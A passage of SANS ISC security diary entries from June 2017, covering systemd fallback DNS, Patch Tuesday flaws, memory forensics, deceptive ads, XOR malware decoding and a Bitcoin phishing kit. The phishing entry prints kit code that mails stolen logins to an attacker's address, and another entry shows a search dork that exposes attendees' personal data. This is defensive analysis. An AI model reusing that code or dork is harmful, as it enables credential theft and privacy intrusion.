        [DNS_SERVERS="8.8.8.8 8.8.4.4 2001:4860:4860::8888 2001:4860:4860::8844"])

How should we interpret this code? systemd has a built-in fallback mechanism, specified at compilation time: if no resolvers are configured, it uses the Google DNS servers by default! I performed a quick check on different Linux distributions (installed out of the box):

Distribution   Comments
ArchLinux      Found the commented line in /etc/systemd/resolved.conf:
               #FallbackDNS=8.8.8.8 8.8.4.4 2001:4860:4860::8888 2001:4860:4860::8844
CentOS         Nothing found
CoreOS         Nothing found
Debian         Nothing found
Fedora         Found the commented line in /etc/systemd/resolved.conf:
               #FallbackDNS=8.8.8.8 8.8.4.4 2001:4860:4860::8888 2001:4860:4860::8844
Gentoo         Nothing found
OpenSuse       Nothing found
RedHat ES      Not tested
Suse ES        Not tested
Ubuntu         Nothing found

Some distributions, like Slackware, never implemented systemd.

The purpose of ‘FallbackDNS’ is defined here[5]:

A space-separated list of IPv4 and IPv6 addresses to use as the fallback DNS servers. Any per-link DNS servers obtained from systemd-networkd.service(8)  take precedence over this setting, as do any servers set via DNS= above or /etc/resolv.conf. This setting is hence only used if no other DNS server information is known. If this option is not given, a compiled-in list of DNS servers is used instead.

I also found an old report about this in the Debian bug tracker[6].

But the DNS configuration is not the only one affected: a list of default NTP servers is also preconfigured at compilation time[7]:

AC_ARG_WITH(ntp-servers,
        AS_HELP_STRING([--with-ntp-servers=NTPSERVERS],
                [space-separated list of default NTP servers]),
        [NTP_SERVERS="$withval"],
        [NTP_SERVERS="time1.google.com time2.google.com time3.google.com time4.google.com"])

Ok, nothing really critical here. Based on the tested distributions, there is almost no risk of systemd silently falling back to the Google DNS. However, this is a good reminder that some developers may introduce dangerous features and/or configurations in their code. Grepping for static IP addresses in configuration files is always a good reflex. As for DNS, my recommendation is to restrict DNS traffic on your network and run your own resolver.
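That grep reflex is easy to automate. A minimal sketch that flags hard-coded IPv4 addresses in a config file's text (the regex is deliberately simple, and the sample input mirrors the FallbackDNS line found above):

```python
import re

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def find_static_ips(text: str):
    """Return hard-coded IPv4 addresses found in configuration text."""
    return [ip for ip in IPV4.findall(text)
            if all(0 <= int(octet) <= 255 for octet in ip.split("."))]

conf = "#FallbackDNS=8.8.8.8 8.8.4.4 2001:4860:4860::8888"
# find_static_ips(conf) flags the two IPv4 fallback resolvers
```

Extending the pattern to IPv6 is left as an exercise; the dotted-quad form above already catches the most common hard-coded resolvers.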

[1] https://developers.google.com/speed/public-dns/privacy
[2] https://docs.docker.com/engine/userguide/networking/default_network/configure-dns/
[3] https://en.wikipedia.org/wiki/Systemd
[4] https://github.com/systemd/systemd/blob/a083537e5d11bce68639c492eda33a7fe997d142/configure.ac#L1305
[5] https://www.freedesktop.org/software/systemd/man/resolved.conf.html#FallbackDNS=
[6] https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=761658
[7] https://github.com/systemd/systemd/blob/master/configure.ac#L1218

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

2 Comments

Published: 2017-06-13

Microsoft and Adobe June 2017 Patch Tuesday: Two Exploited Vulnerabilities Patched

Today, Microsoft and Adobe released their usual monthly security updates. Microsoft patched a total of 96 different vulnerabilities. Three vulnerabilities have already been disclosed publicly, and two vulnerabilities stick out for being already exploited according to Microsoft:

%%cve:2017-8464%%

This vulnerability can be exploited when a user views a malicious shortcut file. Windows shortcuts are small files that describe the shortcut; among other things, the file tells Windows what icon to display to represent it. By including a malicious icon reference, the attacker can execute arbitrary code. This problem is probably most easily exploited by setting up a malicious file share and tricking the user into opening it via a link. Similar vulnerabilities have been exploited in Windows in the past, and public exploits should surface shortly. Microsoft's description of the vulnerability somewhat contradicts itself: in the past, if a vulnerability had already been exploited in the wild, Microsoft labeled it with an exploitability index of "0". In this case, Microsoft uses "1", which indicates that exploitation is merely likely, yet the vulnerability is already being exploited.

%%cve:2017-8543%%

ETERNALBLUE reloaded? This vulnerability is another one that is already being exploited, according to Microsoft. It is triggered by sending a malicious "Search" message via SMB. The bulletin does not state whether exploitation requires authentication. The attacker ends up with full administrative access to the system, so this vulnerability can also be exploited for privilege escalation.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
STI|Twitter|

8 Comments

Published: 2017-06-12

An Introduction to VolUtility

If you would like to practice memory forensics using Volatility, but you don't like command line tools and you hate having to remember plugins, then VolUtility is your friend.

VolUtility[1][2] is a web frontend for the Volatility framework.

 

Installation

In this diary, I will install VolUtility on a Linux SIFT[3] workstation.

 
  1. Update your SIFT workstation and install django with the following commands:

$ sudo apt-get update && sudo apt-get upgrade

$ sudo pip install pymongo django

 

 

  2. Install MongoDB:

In this diary I am not going to discuss how to install MongoDB. For further details on how to install it, please refer to:

https://docs.mongodb.com/v3.2/tutorial/install-mongodb-on-ubuntu/

  3. Install Volatility

$ git clone https://github.com/volatilityfoundation/volatility

$ cd volatility

$ sudo python setup.py install

 

  4. Get VolUtility

$ git clone https://github.com/kevthehermit/VolUtility

 

Configuration

In this diary I am going to use the default config file “volutility.conf.sample”

Running

cd into the VolUtility folder and run the following command. In this diary I will use port 8000 as the listening port:

$ ./manage.py runserver 0.0.0.0:8000

 

Usage

VolUtility operates on the principle of sessions. Each memory image has its own session, which is used to track all the plugin results and associated data.

To create a new session, navigate to the home page and click the "New +" button.

Enter a name for the session and the location of the memory image. For the profile, you can either specify it or choose autodetect, then click the Submit button:

You have to wait a few minutes for it to finish processing the image; once it has finished, the status will change to "Complete".

To examine the image, click on the session name; in this diary it's "SANS ISC". Once you click on the session, it will take you to a new page.

On the upper left corner there will be some information about the session:

Now let’s try some of the plugins :

To run a plugin, type the plugin name in the Filter Plugins text box and run it by clicking the Play button.

And here are some sample outputs:

pslist

netscan

cmdline

One advantage of using VolUtility over the command line is the ability to export results to a CSV file; to do so, click the down arrow next to the result.

And you can of course filter your results using tools such as MS Excel.

_______________________________________________________

[1] https://github.com/kevthehermit/VolUtility/wiki

[2] http://holisticinfosec.blogspot.com/2016/04/toolsmith-115-volatility-acuity-with.html

[3] https://digital-forensics.sans.org/community/downloads

 

 

0 Comments

Published: 2017-06-10

An Occasional Look in the Rear View Mirror

With two new drivers in my home, I am training them to occasionally look in the rear view mirror of their car as an effective way to increase their situational awareness while driving. What if this principle were applied to hardware and software inventory? Perhaps in the form of a quarterly reminder to consider CIS Critical Security Controls 1 and 2, calling for an objective look at hardware and software that might not be so shiny and new. Intentionally searching for this type of deferred maintenance could very well uncover unnecessary risk imposed on the entire organization.

 

Some organizations have an interesting approach: for every new tool purchased, two tools must be retired. What a novel section to include in the business justification for the next new tool. Take a look in the rear view mirror every once in a while, particularly at technology retirement, to make sure you don't just keep growing the collection of tools. Who knows what might be discovered.

 

What grade would you give yourself in the discipline of technology retirement? Please leave what works for you in our comments section below.

 

Russell Eubanks

ISC Handler

SANS Instructor

@russelleubanks

2 Comments

Published: 2017-06-08

Summer STEM for Kids

It's summertime and your little hackers need something to keep them busy! Let's look at some of the options for kids to try out. I've tried each of these programs and have had good luck with them. Please post in the comments any site you have used successfully to teach your kids STEM or IT security. I'll keep this list updated on my GitHub: https://github.com/tcw3bb/ISC_Posts/blob/master/Kids_Coding_Security_Resource.

 

Coding Options (ages 4-7)

Scratch jr (app) http://pbskids.org/learn/scratchjr/

  • A GUI application that uses easy building blocks to make programs. You will need to help your kids, as there is no walkthrough within the app.

Coji (Robot and App) http://wowwee.com/coji

  • Coji is a robot that you move around your house using an app. The app also has games to teach coding basics. About half of the puzzles are too hard for him, but it's fun.

Coding Options (ages 7-12)

Scratch (PC) https://scratch.mit.edu/

  • Scratch is an application that allows you to code using building blocks. This version has more complex logic options.

Hour of Code (PC) https://code.org/learn

  • Learn coding basics using a browser in about an hour per section. Lots of different themes to keep kids interested.

Made with Code (PC) http://Madewithcode.com

  • Similar to Hour of Code, but slanted more towards girls. Great for everyone, though.

Minecraft modding (PC)  http://learntomod.com

  • Uses building blocks like Scratch to make Minecraft mods. There are lots of options to play with, and kids learn by watching videos for each learning objective and earning badges.

 

Scratch Books

Coding Games in Scratch (Jon Woodcock)

20 Games to Create with Scratch (Max Wainewright)

Scratch Coding Cards (Natalie Rusk)

  • These cards can be done one at a time, for coding in little bites.

 

Electronics

Snap Circuits  http://www.snapcircuits.net/

  • These are the replacement for the Science Fair 150-in-1 project kits I grew up with. Build simple electronics by snapping together electronic parts.

Makeblock http://www.makeblock.com/

  • An Arduino kit that plugs into Scratch. There are lots of cool projects, depending on which kits you have. I bought several when RadioShack was closing in my area.

--

Tom Webb

@twsecblog

0 Comments

Published: 2017-06-07

Deceptive Advertisements: What they do and where they come from

About a week ago, a reader asked for help with a nasty typo squatting incident:

The site, “yotube.com”, at the time redirected to fake tech support sites. These sites typically pop up a message alerting the user to a made-up problem and offer a phone number for tech support.

Investigating the site, I found ads, all of which can be characterized as deceptive. In addition to offering tech support, some of the ads offered video players for download, or even suggested that the user has to log in to the site, presenting a made-up login form. If a user clicks on these ads, the user is sent through a number of different redirects.

For example: (URL parameters removed to make this more readable)

hxxp://inclk.com/adServe/feedclick (URL the ad linked to)
hxxp://p185689.inclk.com/adServe/adClick
hxxp://wkee.reddhon.com/d7477cb3-70f0-4861-a578-a5b6ef73a167
hxxp://www.rainbow-networks.com/RBN3seB
hxxp://critical-system-failure8466.97pn76810224.error-notification-3.club/ (fake tech support page)

hxxp://inclk.com/adServe/banners
hxxp://inclk.com/adServe/banners/findBanner
hxxp://service.skybrock.com/serving/
hxxp://cdn.glisteningapples.pro/lp/
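The URLs above are "defanged" ("hxxp", and often "[.]" for dots) so they can't be clicked accidentally. A tiny helper for defanging and refanging during analysis; this follows a common analyst convention, not any official standard, and the naive replace will also bracket dots in paths:

```python
def defang(url: str) -> str:
    """Make a URL non-clickable for sharing in reports (common convention)."""
    return url.replace("http", "hxxp").replace(".", "[.]")

def refang(url: str) -> str:
    """Restore a defanged URL so it can be fed to analysis tooling."""
    return url.replace("hxxp", "http").replace("[.]", ".")
```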

At the time, the ads were hosted at “inclk.com.” Inclk.com is a URL used by RevenueHits, an ad network.

Knowing where these ads come from, I set up an account with RevenueHits and added ads to a test page. So far, I have only gotten deceptive ads like the following:

The ads usually claim that a video player is used to view the page, or they suggest that software like a Flash player is out of date and needs to be updated. In one case, it even suggested that I need to log in to view the site and redirected me to a login page, which could be considered phishing.

Next, you are offered a download:

Below this dialog, a hard to read disclaimer is displayed (I left the colors "as is." Click on the image for a full-resolution version):

Virustotal identifies the resulting download as "Adware." I didn't install it, but from experience, the installer will install a valid Flash Player in addition to a bunch of adware, often in the form of browser toolbars.

Now, these ads were after all displayed on my page, and I had an account set up with RevenueHits. So I decided to inquire about the deceptive ads I received:

I just started testing revenue hits, and all the ads I receive are downloads of fraudulent media players. Is there a way to filter these ads? Do you have a way to flag ads as inappropriate? thx.

The moment I submitted this request, I received the following (obviously automated) response:

JohannesUllrich 

Your account was automatically banned by our system, due to fraudulent traffic sources.

Please notice that once our system mark your traffic as fraud, there is nothing I can do to change it 

Please check again all you traffic sources.

Regards 

Support team

The ads continued to be displayed on my site. A business day later, I received a manual reply to my initial question:

Hi Johannes
Thank you for reaching out to us. 

Our Design team is working these days on the diversity of our ads. 

We are committed to achieve the highest performance as possible for you. Therefore, the ads you see today are the best performing ones on your traffic. 

You can remove some of them from your site but note that it might affect your results.

I still receive exclusively deceptive ads from RevenueHits. However, at least the results are not that bad: RevenueHits would pay me $0.36 for the one "click through" it counted. I haven't set up payment details with them and have no intention of claiming the prize ;-)

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
STI|Twitter|

1 Comments

Published: 2017-06-06

Malware and XOR - Part 2

In part 1, I gave some examples to recover XOR keys from encoded executables if we knew some of the content of the unencoded file (known plaintext attack).

In this part, I give some examples to automate this process using my xor-kpa tool.

xor-kpa.py takes two files as input: the first file contains the plaintext, and the second file the encoded file. We are going to search for the string "This program cannot be run in DOS mode". We could put this string in a file and use it as input, but because I use this string often, xor-kpa also has it as a predefined plaintext named dos. This plaintext can be selected with option -n:

xor-kpa displays some potential keys, in ascending order of extra characters.

Value Key is the recovered key, and Key (hex) is the hexadecimal representation of the key (in case the key would not be printable).

Keystream is the keystream, from which xor-kpa extracted the key by looking for repeating strings.

Extra is the difference between the length of the keystream and the length of the key. If this is just one character, the proposed key is very unlikely to be the encoding key. Output can be filtered by requiring a minimum value for extra by using option -e.

Divide is the number of times the key is present in the keystream.

And counts reports the number of times the same key was recovered at different positions in the encoded file.

So by using this known plaintext (This program cannot be run in DOS mode) with the encoded file, xor-kpa proposes a number of keys. In this example, the key with the highest number of extra characters is the actual encoding key (Password).
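The heart of this known-plaintext attack fits in a few lines of Python. This is a simplified sketch of the idea, not the actual xor-kpa implementation; note that if the known plaintext does not line up with the start of the key, you recover a rotated version of the key:

```python
def xor_crypt(data: bytes, key: bytes) -> bytes:
    """XOR-encode/decode data with a repeating key (the operation is symmetric)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def recover_key(plaintext: bytes, ciphertext: bytes) -> bytes:
    """XOR known plaintext against ciphertext, then extract the repeating unit."""
    keystream = bytes(p ^ c for p, c in zip(plaintext, ciphertext))
    for length in range(1, len(keystream) + 1):
        candidate = keystream[:length]
        if keystream == (candidate * len(keystream))[:len(keystream)]:
            return candidate
    return keystream
```

With the DOS-mode string as plaintext and a file encoded with the key Password, recover_key() returns the keystream's smallest repeating unit, i.e. the key itself.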

Another way to recover the key, which we saw yesterday, is to look for sequences of null bytes (0x00) that have been encoded. xor-kpa.py can do this too, by giving 000000000000... as the plaintext. We could create a file containing null bytes, but it's also possible to provide the plaintext in hex on the command line using the #h# notation:

As this can be long to type, we can also use the #e# notation to instruct xor-kpa to build a sequence by repetition. Here we created a sequence of 256 bytes with value zero (0x00):

The key was recovered, and the count is very high, so it's very likely that the executable contains sequences of 0x00 bytes even longer than 256 bytes.

Another known plaintext that can be used in executables with an embedded manifest (as resource), is PADDINGXX:

Here we use a sequence of ten times the string PADDINGXX as known plaintext:

Please post a comment if you have ideas for other known plaintexts in executables.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

1 Comments

Published: 2017-06-05

Malware and XOR - Part 1

Malware authors often encode their malicious payload, to avoid detection and make analysis more difficult.

I regularly see payloads encoded with the XOR function. Often, they will use a sequence of bytes as the encoding key. For example, let's take Password as the encoding key. The first byte of the payload is XORed with the first byte of the key (P), the second byte of the payload is XORed with the second byte of the key (a), and so on until all bytes of the key have been used. Then we start again with the first byte of the key: the ninth byte of the payload is XORed with the first byte of the key (P), ...

Let's see what this gives with a Windows executable (a PE file), like this one:

The XOR function has some interesting properties for us analysts. XOR a byte with 0x00 (zero), and you get the same byte: XOR with 0x00 is the identity function (f(x) = x).

Since a normal PE file has many sequences of 0x00 bytes, an XOR encoded PE file will contain the encoding key, like here:

So just by opening an XOR-encoded PE file with a binary editor, we can see the repeating key, provided that the key is shorter than the sequences of 0x00 bytes.
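The identity property is easy to verify with a couple of lines of Python, using the Password key from the example above:

```python
def xor_crypt(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key; applying it twice restores the original."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# A run of 0x00 bytes encodes to the key itself, repeated (x ^ 0x00 == x):
assert xor_crypt(b"\x00" * 16, b"Password") == b"PasswordPassword"
```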

Second interesting property of the XOR function: if you XOR the original file (cleartext) with the encoded file (ciphertext), you get the key (or to be more precise, the keystream).

Let's take another example. We know that in many PE files, you can find the string "This program can not be run in DOS mode." in the MZ header (or something similar). Here is this encoded string in the encoded PE file:

If we XOR this encoded string with the unencoded string, we obtain the key:

So if we have the encoded file and the partially unencoded file, we can also recover the key, provided again that the key is shorter than the unencoded text, and that we know where to line up the encoded and unencoded text.

In the next diary entry, I will show a tool to automate this analysis process.

 

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

2 Comments

Published: 2017-06-02

Phishing Campaigns Follow Trends

Those phishing emails that we receive every day in our mailboxes are often related to key players in different fields:

  • Internet actors: Google, Yahoo!, Facebook, ...
  • Software vendors or manufacturers: Apple, Microsoft, Adobe, ...
  • Financial services: PayPal, BoA, <name your preferred bank>, ...
  • Services: DHL, eBay, ...

But the landscape of online services is ever-changing, and new actors (or, more precisely, their customers) become interesting new targets. Yesterday, while hunting, I found for the first time a phishing page targeting customers of the Bitcoin operator BlockChain. Blockchain[1] is a key player in the management of digital assets. The fake[2] page looked like this:

In the meantime, the /block part of the website has already been shut down, probably via the webshell that was installed on the server:

Fortunately, the webshell isn't available anymore. But it was possible to browse the PHP code and gather more information about the person behind this phishing page:

$from = "From: b <hacker@forever.org>\n";
$from .= "MIME-Version: 1.0\r\n";
$from .= "Content-Type: text/html; charset=ISO-8859-1\r\n";
if(@$_GET['accedi']=='login'){
    mail("carlosromero19871@gmail.com", $subj, $msg1, $from);
    header( "Location: richiesta_otp.html" );
}else{

Note that the login procedure on BlockChain is extremely strong: 2FA authentication, and a one-time link sent via email to approve all login attempts. Be sure to activate them if you're a BlockChain customer.

The fact that Bitcoin, the digital currency, is getting more and more popular makes it an interesting new target for attackers. And this is also the case in corporate environments: there is a trend of companies keeping a reserve of Bitcoin to respond to possible ransomware attacks![3]

[1] https://www.blockchain.com
[2] http://klimatika.com.ua/block/
[3] https://www.technologyreview.com/s/601643/companies-are-stockpiling-bitcoin-to-pay-off-cybercriminals/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

2 Comments

Published: 2017-06-01

Sharing Private Data with Webcast Invitations

Last week, at a customer site, we received a forwarded email in a shared mailbox. Somebody from another department had shared an invitation for a webcast “that could be interesting for you, guys!”. This time, no phishing attempt, no malware; just a regular email sent by a well-known security vendor. A colleague was interested in the webcast and clicked on the registration link. He was redirected to a page and was surprised to see all the fields already prefilled with the personal details of the original recipient:

  • Name
  • Organization
  • Email
  • Direct phone number

The link had this format:

http://go.<redacted>.com/CZL00H0wd04C0hkE140jP06

When you visit this link, based on the URI, it expands to the complete registration URL. Even though invitations are usually nominative, people often share webcast invitations with peers, who can be located internally, in restricted groups or... on the wild Internet (forums, mailing lists, etc). For the record, all communications occurred via plain HTTP.

It was tempting to search on Google for similar URLs:

intext:"go.<redacted>.com/"

I found 31 hits containing a URL of the same format. Let’s test some of them… The online form for the other webcast session was indeed prefilled, but... with the same values (those of the first colleague). Hmmm… Do we have some cookies, maybe? Yes, we do! Let’s clear them and refresh the page, and the URL decodes to the personal details of the attendee:

After more investigation, I found some links of the same format posted on Twitter:

Such information is a gold mine for setting up a spear phishing attack! The attacker knows your details, your interest in the <vendor> products, and that you attended a webinar on a specific date. Keep this in mind when sharing invitations outside a restricted audience!

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

2 Comments